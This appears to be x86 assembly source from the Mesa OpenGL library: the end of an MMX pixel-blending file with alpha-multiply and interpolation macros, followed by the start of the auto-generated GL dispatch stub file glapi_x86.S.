PMULLW ( MP1, MA1 ) /* t1 = p1*a1 */ ;\
;\
TWO(PSUBW ( MX1, MA2 )) /* a2 + 1 | a2 + 1 | a2 + 1 | a2 + 1 */ ;\
TWO(PMULLW ( MP2, MA2 )) /* t2 = p2*a2 */ ;\
;\
PSRLW ( CONST(8), MA1 ) /* t1 >> 8 ~= t1/255 */ ;\
TWO(PSRLW ( CONST(8), MA2 )) /* t2 >> 8 ~= t2/255 */
/* integer multiplication - geometric series
*
* takes the geometric series approximation to the division
*
* t/255 = (t >> 8) + (t >> 16) + (t >> 24) ..
*
* in this case just the first two terms to fit in 16bit arithmetic
*
* t/255 ~= (t + (t >> 8)) >> 8
*
* note that just by itself it doesn't satisfies the OpenGL criteria, as 255*255 = 254,
* so the special case a = 255 must be accounted or roundoff must be used
*/
#define GMB_MULT_GS( MP1, MA1, MP2, MA2 ) \
PMULLW ( MP1, MA1 ) /* t1 = p1*a1 */ ;\
TWO(PMULLW ( MP2, MA2 )) /* t2 = p2*a2 */ ;\
;\
MOVQ ( MA1, MP1 ) ;\
PSRLW ( CONST(8), MA1 ) /* t1 >> 8 */ ;\
;\
TWO(MOVQ ( MA2, MP2 )) ;\
TWO(PSRLW ( CONST(8), MA2 )) /* t2 >> 8 */ ;\
;\
PADDW ( MP1, MA1 ) /* t1 + (t1 >> 8) ~= (t1/255) << 8 */ ;\
PSRLW ( CONST(8), MA1 ) /* sa1 | sb1 | sg1 | sr1 */ ;\
;\
TWO(PADDW ( MP2, MA2 )) /* t2 + (t2 >> 8) ~= (t2/255) << 8 */ ;\
TWO(PSRLW ( CONST(8), MA2 )) /* sa2 | sb2 | sg2 | sr2 */
/* integer multiplication - geometric series plus rounding
*
* when using a geometric series division instead of truncating the result
* use roundoff in the approximation (Jim Blinn)
*
* t = rgb*a + 0x80
*
* achieving the exact results
*
* note that M80 is register with the 0x0080008000800080 constant
*/
#define GMB_MULT_GSR( MP1, MA1, MP2, MA2, M80 ) \
PMULLW ( MP1, MA1 ) /* t1 = p1*a1 */ ;\
PADDW ( M80, MA1 ) /* t1 += 0x80 */ ;\
;\
TWO(PMULLW ( MP2, MA2 )) /* t2 = p2*a2 */ ;\
TWO(PADDW ( M80, MA2 )) /* t2 += 0x80 */ ;\
;\
MOVQ ( MA1, MP1 ) ;\
PSRLW ( CONST(8), MA1 ) /* t1 >> 8 */ ;\
;\
TWO(MOVQ ( MA2, MP2 )) ;\
TWO(PSRLW ( CONST(8), MA2 )) /* t2 >> 8 */ ;\
;\
PADDW ( MP1, MA1 ) /* t1 + (t1 >> 8) ~= (t1/255) << 8 */ ;\
PSRLW ( CONST(8), MA1 ) /* sa1 | sb1 | sg1 | sr1 */ ;\
;\
TWO(PADDW ( MP2, MA2 )) /* t2 + (t2 >> 8) ~= (t2/255) << 8 */ ;\
TWO(PSRLW ( CONST(8), MA2 )) /* sa2 | sb2 | sg2 | sr2 */
/* linear interpolation - geometric series
*/
#define GMB_LERP_GS( MP1, MQ1, MA1, MP2, MQ2, MA2) \
PSUBW ( MQ1, MP1 ) /* pa1 - qa1 | pb1 - qb1 | pg1 - qg1 | pr1 - qr1 */ ;\
PSLLW ( CONST(8), MQ1 ) /* q1 << 8 */ ;\
PMULLW ( MP1, MA1 ) /* t1 = (q1 - p1)*pa1 */ ;\
;\
TWO(PSUBW ( MQ2, MP2 )) /* pa2 - qa2 | pb2 - qb2 | pg2 - qg2 | pr2 - qr2 */ ;\
TWO(PSLLW ( CONST(8), MQ2 )) /* q2 << 8 */ ;\
TWO(PMULLW ( MP2, MA2 )) /* t2 = (q2 - p2)*pa2 */ ;\
;\
MOVQ ( MA1, MP1 ) ;\
PSRLW ( CONST(8), MA1 ) /* t1 >> 8 */ ;\
;\
TWO(MOVQ ( MA2, MP2 )) ;\
TWO(PSRLW ( CONST(8), MA2 )) /* t2 >> 8 */ ;\
;\
PADDW ( MP1, MA1 ) /* t1 + (t1 >> 8) ~= (t1/255) << 8 */ ;\
TWO(PADDW ( MP2, MA2 )) /* t2 + (t2 >> 8) ~= (t2/255) << 8 */ ;\
;\
PADDW ( MQ1, MA1 ) /* (t1/255 + q1) << 8 */ ;\
TWO(PADDW ( MQ2, MA2 )) /* (t2/255 + q2) << 8 */ ;\
;\
PSRLW ( CONST(8), MA1 ) /* sa1 | sb1 | sg1 | sr1 */ ;\
TWO(PSRLW ( CONST(8), MA2 )) /* sa2 | sb2 | sg2 | sr2 */
/* linear interpolation - geometric series with roundoff
*
* this is a generalization of Blinn's formula to signed arithmetic
*
* note that M80 is a register with the 0x0080008000800080 constant
*/
#define GMB_LERP_GSR( MP1, MQ1, MA1, MP2, MQ2, MA2, M80) \
PSUBW ( MQ1, MP1 ) /* pa1 - qa1 | pb1 - qb1 | pg1 - qg1 | pr1 - qr1 */ ;\
PSLLW ( CONST(8), MQ1 ) /* q1 << 8 */ ;\
PMULLW ( MP1, MA1 ) /* t1 = (q1 - p1)*pa1 */ ;\
;\
TWO(PSUBW ( MQ2, MP2 )) /* pa2 - qa2 | pb2 - qb2 | pg2 - qg2 | pr2 - qr2 */ ;\
TWO(PSLLW ( CONST(8), MQ2 )) /* q2 << 8 */ ;\
TWO(PMULLW ( MP2, MA2 )) /* t2 = (q2 - p2)*pa2 */ ;\
;\
PSRLW ( CONST(15), MP1 ) /* q1 > p1 ? 1 : 0 */ ;\
TWO(PSRLW ( CONST(15), MP2 )) /* q2 > q2 ? 1 : 0 */ ;\
;\
PSLLW ( CONST(8), MP1 ) /* q1 > p1 ? 0x100 : 0 */ ;\
TWO(PSLLW ( CONST(8), MP2 )) /* q2 > q2 ? 0x100 : 0 */ ;\
;\
PSUBW ( MP1, MA1 ) /* t1 -=? 0x100 */ ;\
TWO(PSUBW ( MP2, MA2 )) /* t2 -=? 0x100 */ ;\
;\
PADDW ( M80, MA1 ) /* t1 += 0x80 */ ;\
TWO(PADDW ( M80, MA2 )) /* t2 += 0x80 */ ;\
;\
MOVQ ( MA1, MP1 ) ;\
PSRLW ( CONST(8), MA1 ) /* t1 >> 8 */ ;\
;\
TWO(MOVQ ( MA2, MP2 )) ;\
TWO(PSRLW ( CONST(8), MA2 )) /* t2 >> 8 */ ;\
;\
PADDW ( MP1, MA1 ) /* t1 + (t1 >> 8) ~= (t1/255) << 8 */ ;\
TWO(PADDW ( MP2, MA2 )) /* t2 + (t2 >> 8) ~= (t2/255) << 8 */ ;\
;\
PADDW ( MQ1, MA1 ) /* (t1/255 + q1) << 8 */ ;\
TWO(PADDW ( MQ2, MA2 )) /* (t2/255 + q2) << 8 */ ;\
;\
PSRLW ( CONST(8), MA1 ) /* sa1 | sb1 | sg1 | sr1 */ ;\
TWO(PSRLW ( CONST(8), MA2 )) /* sa2 | sb2 | sg2 | sr2 */
/* linear interpolation - geometric series with correction
*
* instead of the roundoff this adds a small correction to satisfy the OpenGL criteria
*
* t/255 ~= (t + (t >> 8) + (t >> 15)) >> 8
*
* note that although is faster than rounding off it doesn't give always the exact results
*/
#define GMB_LERP_GSC( MP1, MQ1, MA1, MP2, MQ2, MA2) \
PSUBW ( MQ1, MP1 ) /* pa1 - qa1 | pb1 - qb1 | pg1 - qg1 | pr1 - qr1 */ ;\
PSLLW ( CONST(8), MQ1 ) /* q1 << 8 */ ;\
PMULLW ( MP1, MA1 ) /* t1 = (q1 - p1)*pa1 */ ;\
;\
TWO(PSUBW ( MQ2, MP2 )) /* pa2 - qa2 | pb2 - qb2 | pg2 - qg2 | pr2 - qr2 */ ;\
TWO(PSLLW ( CONST(8), MQ2 )) /* q2 << 8 */ ;\
TWO(PMULLW ( MP2, MA2 )) /* t2 = (q2 - p2)*pa2 */ ;\
;\
MOVQ ( MA1, MP1 ) ;\
PSRLW ( CONST(8), MA1 ) /* t1 >> 8 */ ;\
;\
TWO(MOVQ ( MA2, MP2 )) ;\
TWO(PSRLW ( CONST(8), MA2 )) /* t2 >> 8 */ ;\
;\
PADDW ( MA1, MP1 ) /* t1 + (t1 >> 8) ~= (t1/255) << 8 */ ;\
PSRLW ( CONST(7), MA1 ) /* t1 >> 15 */ ;\
;\
TWO(PADDW ( MA2, MP2 )) /* t2 + (t2 >> 8) ~= (t2/255) << 8 */ ;\
TWO(PSRLW ( CONST(7), MA2 )) /* t2 >> 15 */ ;\
;\
PADDW ( MP1, MA1 ) /* t1 + (t1 >> 8) + (t1 >>15) ~= (t1/255) << 8 */ ;\
TWO(PADDW ( MP2, MA2 )) /* t2 + (t2 >> 8) + (t2 >>15) ~= (t2/255) << 8 */ ;\
;\
PADDW ( MQ1, MA1 ) /* (t1/255 + q1) << 8 */ ;\
TWO(PADDW ( MQ2, MA2 )) /* (t2/255 + q2) << 8 */ ;\
;\
PSRLW ( CONST(8), MA1 ) /* sa1 | sb1 | sg1 | sr1 */ ;\
TWO(PSRLW ( CONST(8), MA2 )) /* sa2 | sb2 | sg2 | sr2 */
/* common blending setup code
*
* note that M00 is a register with 0x0000000000000000 constant which can be easily obtained making
*
* PXOR ( M00, M00 )
*/
#define GMB_LOAD(rgba, dest, MPP, MQQ) \
ONE(MOVD ( REGIND(rgba), MPP )) /* | | | | qa1 | qb1 | qg1 | qr1 */ ;\
ONE(MOVD ( REGIND(dest), MQQ )) /* | | | | pa1 | pb1 | pg1 | pr1 */ ;\
;\
TWO(MOVQ ( REGIND(rgba), MPP )) /* qa2 | qb2 | qg2 | qr2 | qa1 | qb1 | qg1 | qr1 */ ;\
TWO(MOVQ ( REGIND(dest), MQQ )) /* pa2 | pb2 | pg2 | pr2 | pa1 | pb1 | pg1 | pr1 */
#define GMB_UNPACK(MP1, MQ1, MP2, MQ2, M00) \
TWO(MOVQ ( MP1, MP2 )) ;\
TWO(MOVQ ( MQ1, MQ2 )) ;\
;\
PUNPCKLBW ( M00, MQ1 ) /* qa1 | qb1 | qg1 | qr1 */ ;\
TWO(PUNPCKHBW ( M00, MQ2 )) /* qa2 | qb2 | qg2 | qr2 */ ;\
PUNPCKLBW ( M00, MP1 ) /* pa1 | pb1 | pg1 | pr1 */ ;\
TWO(PUNPCKHBW ( M00, MP2 )) /* pa2 | pb2 | pg2 | pr2 */
#define GMB_ALPHA(MP1, MA1, MP2, MA2) \
MOVQ ( MP1, MA1 ) ;\
TWO(MOVQ ( MP2, MA2 )) ;\
;\
PUNPCKHWD ( MA1, MA1 ) /* pa1 | pa1 | | */ ;\
TWO(PUNPCKHWD ( MA2, MA2 )) /* pa2 | pa2 | | */ ;\
PUNPCKHDQ ( MA1, MA1 ) /* pa1 | pa1 | pa1 | pa1 */ ;\
TWO(PUNPCKHDQ ( MA2, MA2 )) /* pa2 | pa2 | pa2 | pa2 */
#define GMB_PACK( MS1, MS2 ) \
PACKUSWB ( MS2, MS1 ) /* sa2 | sb2 | sg2 | sr2 | sa1 | sb1 | sg1 | sr1 */ ;\
#define GMB_STORE(rgba, MSS ) \
ONE(MOVD ( MSS, REGIND(rgba) )) /* | | | | sa1 | sb1 | sg1 | sr1 */ ;\
TWO(MOVQ ( MSS, REGIND(rgba) )) /* sa2 | sb2 | sg2 | sr2 | sa1 | sb1 | sg1 | sr1 */
/* Kevin F. Quinn <kevquinn@gentoo.org> 2 July 2006
* Replace data segment constants with text-segment
* constants (via pushl/movq)
SEG_DATA
ALIGNDATA8
const_0080:
D_LONG 0x00800080, 0x00800080
const_80:
D_LONG 0x80808080, 0x80808080
*/
#define const_0080_l 0x00800080
#define const_0080_h 0x00800080
#define const_80_l 0x80808080
#define const_80_h 0x80808080
SEG_TEXT
/* Blend transparency function
*/
#define TAG(x) CONCAT(x,_transparency)
#define LLTAG(x) LLBL2(x,_transparency)
#define INIT \
PXOR ( MM0, MM0 ) /* 0x0000 | 0x0000 | 0x0000 | 0x0000 */
#define MAIN( rgba, dest ) \
GMB_LOAD( rgba, dest, MM1, MM2 ) ;\
GMB_UNPACK( MM1, MM2, MM4, MM5, MM0 ) ;\
GMB_ALPHA( MM1, MM3, MM4, MM6 ) ;\
GMB_LERP_GSC( MM1, MM2, MM3, MM4, MM5, MM6 ) ;\
GMB_PACK( MM3, MM6 ) ;\
GMB_STORE( rgba, MM3 )
#include "mmx_blendtmp.h"
/* Blend add function
*
* FIXME: Add some loop unrolling here...
*/
#define TAG(x) CONCAT(x,_add)
#define LLTAG(x) LLBL2(x,_add)
#define INIT
#define MAIN( rgba, dest ) \
ONE(MOVD ( REGIND(rgba), MM1 )) /* | | | | qa1 | qb1 | qg1 | qr1 */ ;\
ONE(MOVD ( REGIND(dest), MM2 )) /* | | | | pa1 | pb1 | pg1 | pr1 */ ;\
ONE(PADDUSB ( MM2, MM1 )) ;\
ONE(MOVD ( MM1, REGIND(rgba) )) /* | | | | sa1 | sb1 | sg1 | sr1 */ ;\
;\
TWO(MOVQ ( REGIND(rgba), MM1 )) /* qa2 | qb2 | qg2 | qr2 | qa1 | qb1 | qg1 | qr1 */ ;\
TWO(PADDUSB ( REGIND(dest), MM1 )) /* sa2 | sb2 | sg2 | sr2 | sa1 | sb1 | sg1 | sr1 */ ;\
TWO(MOVQ ( MM1, REGIND(rgba) ))
#include "mmx_blendtmp.h"
/* Blend min function
*/
#define TAG(x) CONCAT(x,_min)
#define LLTAG(x) LLBL2(x,_min)
/* Kevin F. Quinn 2nd July 2006
* Replace data segment constants with text-segment instructions
#define INIT \
MOVQ ( CONTENT(const_80), MM7 )
*/
#define INIT \
PUSH_L ( CONST(const_80_h) ) /* 0x80| 0x80| 0x80| 0x80| 0x80| 0x80| 0x80| 0x80*/ ;\
PUSH_L ( CONST(const_80_l) ) ;\
MOVQ ( REGIND(ESP), MM7 ) ;\
ADD_L ( CONST(8), ESP)
#define MAIN( rgba, dest ) \
GMB_LOAD( rgba, dest, MM1, MM2 ) ;\
MOVQ ( MM1, MM3 ) ;\
MOVQ ( MM2, MM4 ) ;\
PXOR ( MM7, MM3 ) /* unsigned -> signed */ ;\
PXOR ( MM7, MM4 ) /* unsigned -> signed */ ;\
PCMPGTB ( MM3, MM4 ) /* q > p ? 0xff : 0x00 */ ;\
PAND ( MM4, MM1 ) /* q > p ? p : 0 */ ;\
PANDN ( MM2, MM4 ) /* q > p ? 0 : q */ ;\
POR ( MM1, MM4 ) /* q > p ? p : q */ ;\
GMB_STORE( rgba, MM4 )
#include "mmx_blendtmp.h"
/* Blend max function
*/
#define TAG(x) CONCAT(x,_max)
#define LLTAG(x) LLBL2(x,_max)
/* Kevin F. Quinn 2nd July 2006
* Replace data segment constants with text-segment instructions
#define INIT \
MOVQ ( CONTENT(const_80), MM7 )
*/
#define INIT \
PUSH_L ( CONST(const_80_l) ) /* 0x80| 0x80| 0x80| 0x80| 0x80| 0x80| 0x80| 0x80*/ ;\
PUSH_L ( CONST(const_80_h) ) ;\
MOVQ ( REGIND(ESP), MM7 ) ;\
ADD_L ( CONST(8), ESP)
#define MAIN( rgba, dest ) \
GMB_LOAD( rgba, dest, MM1, MM2 ) ;\
MOVQ ( MM1, MM3 ) ;\
MOVQ ( MM2, MM4 ) ;\
PXOR ( MM7, MM3 ) /* unsigned -> signed */ ;\
PXOR ( MM7, MM4 ) /* unsigned -> signed */ ;\
PCMPGTB ( MM3, MM4 ) /* q > p ? 0xff : 0x00 */ ;\
PAND ( MM4, MM2 ) /* q > p ? q : 0 */ ;\
PANDN ( MM1, MM4 ) /* q > p ? 0 : p */ ;\
POR ( MM2, MM4 ) /* q > p ? p : q */ ;\
GMB_STORE( rgba, MM4 )
#include "mmx_blendtmp.h"
/* Blend modulate function
*/
#define TAG(x) CONCAT(x,_modulate)
#define LLTAG(x) LLBL2(x,_modulate)
/* Kevin F. Quinn 2nd July 2006
* Replace data segment constants with text-segment instructions
#define INIT \
MOVQ ( CONTENT(const_0080), MM7 )
*/
#define INIT \
PXOR ( MM0, MM0 ) /* 0x0000 | 0x0000 | 0x0000 | 0x0000 */ ;\
PUSH_L ( CONST(const_0080_l) ) /* 0x0080 | 0x0080 | 0x0080 | 0x0080 */ ;\
PUSH_L ( CONST(const_0080_h) ) ;\
MOVQ ( REGIND(ESP), MM7 ) ;\
ADD_L ( CONST(8), ESP)
#define MAIN( rgba, dest ) \
GMB_LOAD( rgba, dest, MM1, MM2 ) ;\
GMB_UNPACK( MM1, MM2, MM4, MM5, MM0 ) ;\
GMB_MULT_GSR( MM1, MM2, MM4, MM5, MM7 ) ;\
GMB_PACK( MM2, MM5 ) ;\
GMB_STORE( rgba, MM2 )
#include "mmx_blendtmp.h"
#endif
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 96,743
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/glapi_x86.S
|
/* DO NOT EDIT - This file generated automatically by gl_x86_asm.py (from Mesa) script */
/*
* Copyright (C) 1999-2001 Brian Paul All Rights Reserved.
* (C) Copyright IBM Corporation 2004, 2005
* All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sub license,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice (including the next
* paragraph) shall be included in all copies or substantial portions of the
* Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL, IBM,
* AND/OR THEIR SUPPLIERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF
* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
#include "assyntax.h"
#include "glapioffsets.h"
#if defined(STDCALL_API)
# if defined(USE_MGL_NAMESPACE)
# define GL_PREFIX(n,n2) GLNAME(CONCAT(mgl,n2))
# else
# define GL_PREFIX(n,n2) GLNAME(CONCAT(gl,n2))
# endif
#else
# if defined(USE_MGL_NAMESPACE)
# define GL_PREFIX(n,n2) GLNAME(CONCAT(mgl,n))
# define _glapi_Dispatch _mglapi_Dispatch
# else
# define GL_PREFIX(n,n2) GLNAME(CONCAT(gl,n))
# endif
#endif
#define GL_OFFSET(x) CODEPTR(REGOFF(4 * x, EAX))
#if defined(GNU_ASSEMBLER) && !defined(__DJGPP__) && !defined(__MINGW32__)
#define GLOBL_FN(x) GLOBL x ; .type x, function
#else
#define GLOBL_FN(x) GLOBL x
#endif
#if defined(PTHREADS) || defined(USE_XTHREADS) || defined(SOLARIS_THREADS) || defined(WIN32_THREADS) || defined(BEOS_THREADS)
# define THREADS
#endif
#ifdef GLX_USE_TLS
#ifdef GLX_X86_READONLY_TEXT
# define CTX_INSNS MOV_L(GS:(EAX), EAX)
#else
# define CTX_INSNS NOP /* Pad for init_glapi_relocs() */
#endif
# define GL_STUB(fn,off,fn_alt) \
ALIGNTEXT16; \
GLOBL_FN(GL_PREFIX(fn, fn_alt)); \
GL_PREFIX(fn, fn_alt): \
CALL(_x86_get_dispatch) ; \
CTX_INSNS ; \
JMP(GL_OFFSET(off))
#elif defined(PTHREADS)
# define GL_STUB(fn,off,fn_alt) \
ALIGNTEXT16; \
GLOBL_FN(GL_PREFIX(fn, fn_alt)); \
GL_PREFIX(fn, fn_alt): \
MOV_L(CONTENT(GLNAME(_glapi_Dispatch)), EAX) ; \
TEST_L(EAX, EAX) ; \
JE(1f) ; \
JMP(GL_OFFSET(off)) ; \
1: CALL(_x86_get_dispatch) ; \
JMP(GL_OFFSET(off))
#elif defined(THREADS)
# define GL_STUB(fn,off,fn_alt) \
ALIGNTEXT16; \
GLOBL_FN(GL_PREFIX(fn, fn_alt)); \
GL_PREFIX(fn, fn_alt): \
MOV_L(CONTENT(GLNAME(_glapi_Dispatch)), EAX) ; \
TEST_L(EAX, EAX) ; \
JE(1f) ; \
JMP(GL_OFFSET(off)) ; \
1: CALL(_glapi_get_dispatch) ; \
JMP(GL_OFFSET(off))
#else /* Non-threaded version. */
# define GL_STUB(fn,off,fn_alt) \
ALIGNTEXT16; \
GLOBL_FN(GL_PREFIX(fn, fn_alt)); \
GL_PREFIX(fn, fn_alt): \
MOV_L(CONTENT(GLNAME(_glapi_Dispatch)), EAX) ; \
JMP(GL_OFFSET(off))
#endif
#ifdef HAVE_ALIAS
# define GL_STUB_ALIAS(fn,off,fn_alt,alias,alias_alt) \
.globl GL_PREFIX(fn, fn_alt) ; \
.set GL_PREFIX(fn, fn_alt), GL_PREFIX(alias, alias_alt)
#else
# define GL_STUB_ALIAS(fn,off,fn_alt,alias,alias_alt) \
GL_STUB(fn, off, fn_alt)
#endif
SEG_TEXT
#ifdef GLX_USE_TLS
GLOBL GLNAME(_x86_get_dispatch)
HIDDEN(GLNAME(_x86_get_dispatch))
ALIGNTEXT16
GLNAME(_x86_get_dispatch):
call 1f
1: popl %eax
addl $_GLOBAL_OFFSET_TABLE_+[.-1b], %eax
movl _glapi_tls_Dispatch@GOTNTPOFF(%eax), %eax
ret
#elif defined(PTHREADS)
EXTERN GLNAME(_glapi_Dispatch)
EXTERN GLNAME(_gl_DispatchTSD)
EXTERN GLNAME(pthread_getspecific)
ALIGNTEXT16
GLNAME(_x86_get_dispatch):
SUB_L(CONST(24), ESP)
PUSH_L(GLNAME(_gl_DispatchTSD))
CALL(GLNAME(pthread_getspecific))
ADD_L(CONST(28), ESP)
RET
#elif defined(THREADS)
EXTERN GLNAME(_glapi_get_dispatch)
#endif
#if defined( GLX_USE_TLS ) && !defined( GLX_X86_READONLY_TEXT )
.section wtext, "awx", @progbits
#endif /* defined( GLX_USE_TLS ) */
ALIGNTEXT16
GLOBL GLNAME(gl_dispatch_functions_start)
HIDDEN(GLNAME(gl_dispatch_functions_start))
GLNAME(gl_dispatch_functions_start):
GL_STUB(NewList, _gloffset_NewList, NewList@8)
GL_STUB(EndList, _gloffset_EndList, EndList@0)
GL_STUB(CallList, _gloffset_CallList, CallList@4)
GL_STUB(CallLists, _gloffset_CallLists, CallLists@12)
GL_STUB(DeleteLists, _gloffset_DeleteLists, DeleteLists@8)
GL_STUB(GenLists, _gloffset_GenLists, GenLists@4)
GL_STUB(ListBase, _gloffset_ListBase, ListBase@4)
GL_STUB(Begin, _gloffset_Begin, Begin@4)
GL_STUB(Bitmap, _gloffset_Bitmap, Bitmap@28)
GL_STUB(Color3b, _gloffset_Color3b, Color3b@12)
GL_STUB(Color3bv, _gloffset_Color3bv, Color3bv@4)
GL_STUB(Color3d, _gloffset_Color3d, Color3d@24)
GL_STUB(Color3dv, _gloffset_Color3dv, Color3dv@4)
GL_STUB(Color3f, _gloffset_Color3f, Color3f@12)
GL_STUB(Color3fv, _gloffset_Color3fv, Color3fv@4)
GL_STUB(Color3i, _gloffset_Color3i, Color3i@12)
GL_STUB(Color3iv, _gloffset_Color3iv, Color3iv@4)
GL_STUB(Color3s, _gloffset_Color3s, Color3s@12)
GL_STUB(Color3sv, _gloffset_Color3sv, Color3sv@4)
GL_STUB(Color3ub, _gloffset_Color3ub, Color3ub@12)
GL_STUB(Color3ubv, _gloffset_Color3ubv, Color3ubv@4)
GL_STUB(Color3ui, _gloffset_Color3ui, Color3ui@12)
GL_STUB(Color3uiv, _gloffset_Color3uiv, Color3uiv@4)
GL_STUB(Color3us, _gloffset_Color3us, Color3us@12)
GL_STUB(Color3usv, _gloffset_Color3usv, Color3usv@4)
GL_STUB(Color4b, _gloffset_Color4b, Color4b@16)
GL_STUB(Color4bv, _gloffset_Color4bv, Color4bv@4)
GL_STUB(Color4d, _gloffset_Color4d, Color4d@32)
GL_STUB(Color4dv, _gloffset_Color4dv, Color4dv@4)
GL_STUB(Color4f, _gloffset_Color4f, Color4f@16)
GL_STUB(Color4fv, _gloffset_Color4fv, Color4fv@4)
GL_STUB(Color4i, _gloffset_Color4i, Color4i@16)
GL_STUB(Color4iv, _gloffset_Color4iv, Color4iv@4)
GL_STUB(Color4s, _gloffset_Color4s, Color4s@16)
GL_STUB(Color4sv, _gloffset_Color4sv, Color4sv@4)
GL_STUB(Color4ub, _gloffset_Color4ub, Color4ub@16)
GL_STUB(Color4ubv, _gloffset_Color4ubv, Color4ubv@4)
GL_STUB(Color4ui, _gloffset_Color4ui, Color4ui@16)
GL_STUB(Color4uiv, _gloffset_Color4uiv, Color4uiv@4)
GL_STUB(Color4us, _gloffset_Color4us, Color4us@16)
GL_STUB(Color4usv, _gloffset_Color4usv, Color4usv@4)
GL_STUB(EdgeFlag, _gloffset_EdgeFlag, EdgeFlag@4)
GL_STUB(EdgeFlagv, _gloffset_EdgeFlagv, EdgeFlagv@4)
GL_STUB(End, _gloffset_End, End@0)
GL_STUB(Indexd, _gloffset_Indexd, Indexd@8)
GL_STUB(Indexdv, _gloffset_Indexdv, Indexdv@4)
GL_STUB(Indexf, _gloffset_Indexf, Indexf@4)
GL_STUB(Indexfv, _gloffset_Indexfv, Indexfv@4)
GL_STUB(Indexi, _gloffset_Indexi, Indexi@4)
GL_STUB(Indexiv, _gloffset_Indexiv, Indexiv@4)
GL_STUB(Indexs, _gloffset_Indexs, Indexs@4)
GL_STUB(Indexsv, _gloffset_Indexsv, Indexsv@4)
GL_STUB(Normal3b, _gloffset_Normal3b, Normal3b@12)
GL_STUB(Normal3bv, _gloffset_Normal3bv, Normal3bv@4)
GL_STUB(Normal3d, _gloffset_Normal3d, Normal3d@24)
GL_STUB(Normal3dv, _gloffset_Normal3dv, Normal3dv@4)
GL_STUB(Normal3f, _gloffset_Normal3f, Normal3f@12)
GL_STUB(Normal3fv, _gloffset_Normal3fv, Normal3fv@4)
GL_STUB(Normal3i, _gloffset_Normal3i, Normal3i@12)
GL_STUB(Normal3iv, _gloffset_Normal3iv, Normal3iv@4)
GL_STUB(Normal3s, _gloffset_Normal3s, Normal3s@12)
GL_STUB(Normal3sv, _gloffset_Normal3sv, Normal3sv@4)
GL_STUB(RasterPos2d, _gloffset_RasterPos2d, RasterPos2d@16)
GL_STUB(RasterPos2dv, _gloffset_RasterPos2dv, RasterPos2dv@4)
GL_STUB(RasterPos2f, _gloffset_RasterPos2f, RasterPos2f@8)
GL_STUB(RasterPos2fv, _gloffset_RasterPos2fv, RasterPos2fv@4)
GL_STUB(RasterPos2i, _gloffset_RasterPos2i, RasterPos2i@8)
GL_STUB(RasterPos2iv, _gloffset_RasterPos2iv, RasterPos2iv@4)
GL_STUB(RasterPos2s, _gloffset_RasterPos2s, RasterPos2s@8)
GL_STUB(RasterPos2sv, _gloffset_RasterPos2sv, RasterPos2sv@4)
GL_STUB(RasterPos3d, _gloffset_RasterPos3d, RasterPos3d@24)
GL_STUB(RasterPos3dv, _gloffset_RasterPos3dv, RasterPos3dv@4)
GL_STUB(RasterPos3f, _gloffset_RasterPos3f, RasterPos3f@12)
GL_STUB(RasterPos3fv, _gloffset_RasterPos3fv, RasterPos3fv@4)
GL_STUB(RasterPos3i, _gloffset_RasterPos3i, RasterPos3i@12)
GL_STUB(RasterPos3iv, _gloffset_RasterPos3iv, RasterPos3iv@4)
GL_STUB(RasterPos3s, _gloffset_RasterPos3s, RasterPos3s@12)
GL_STUB(RasterPos3sv, _gloffset_RasterPos3sv, RasterPos3sv@4)
GL_STUB(RasterPos4d, _gloffset_RasterPos4d, RasterPos4d@32)
GL_STUB(RasterPos4dv, _gloffset_RasterPos4dv, RasterPos4dv@4)
GL_STUB(RasterPos4f, _gloffset_RasterPos4f, RasterPos4f@16)
GL_STUB(RasterPos4fv, _gloffset_RasterPos4fv, RasterPos4fv@4)
GL_STUB(RasterPos4i, _gloffset_RasterPos4i, RasterPos4i@16)
GL_STUB(RasterPos4iv, _gloffset_RasterPos4iv, RasterPos4iv@4)
GL_STUB(RasterPos4s, _gloffset_RasterPos4s, RasterPos4s@16)
GL_STUB(RasterPos4sv, _gloffset_RasterPos4sv, RasterPos4sv@4)
GL_STUB(Rectd, _gloffset_Rectd, Rectd@32)
GL_STUB(Rectdv, _gloffset_Rectdv, Rectdv@8)
GL_STUB(Rectf, _gloffset_Rectf, Rectf@16)
GL_STUB(Rectfv, _gloffset_Rectfv, Rectfv@8)
GL_STUB(Recti, _gloffset_Recti, Recti@16)
GL_STUB(Rectiv, _gloffset_Rectiv, Rectiv@8)
GL_STUB(Rects, _gloffset_Rects, Rects@16)
GL_STUB(Rectsv, _gloffset_Rectsv, Rectsv@8)
GL_STUB(TexCoord1d, _gloffset_TexCoord1d, TexCoord1d@8)
GL_STUB(TexCoord1dv, _gloffset_TexCoord1dv, TexCoord1dv@4)
GL_STUB(TexCoord1f, _gloffset_TexCoord1f, TexCoord1f@4)
GL_STUB(TexCoord1fv, _gloffset_TexCoord1fv, TexCoord1fv@4)
GL_STUB(TexCoord1i, _gloffset_TexCoord1i, TexCoord1i@4)
GL_STUB(TexCoord1iv, _gloffset_TexCoord1iv, TexCoord1iv@4)
GL_STUB(TexCoord1s, _gloffset_TexCoord1s, TexCoord1s@4)
GL_STUB(TexCoord1sv, _gloffset_TexCoord1sv, TexCoord1sv@4)
GL_STUB(TexCoord2d, _gloffset_TexCoord2d, TexCoord2d@16)
GL_STUB(TexCoord2dv, _gloffset_TexCoord2dv, TexCoord2dv@4)
GL_STUB(TexCoord2f, _gloffset_TexCoord2f, TexCoord2f@8)
GL_STUB(TexCoord2fv, _gloffset_TexCoord2fv, TexCoord2fv@4)
GL_STUB(TexCoord2i, _gloffset_TexCoord2i, TexCoord2i@8)
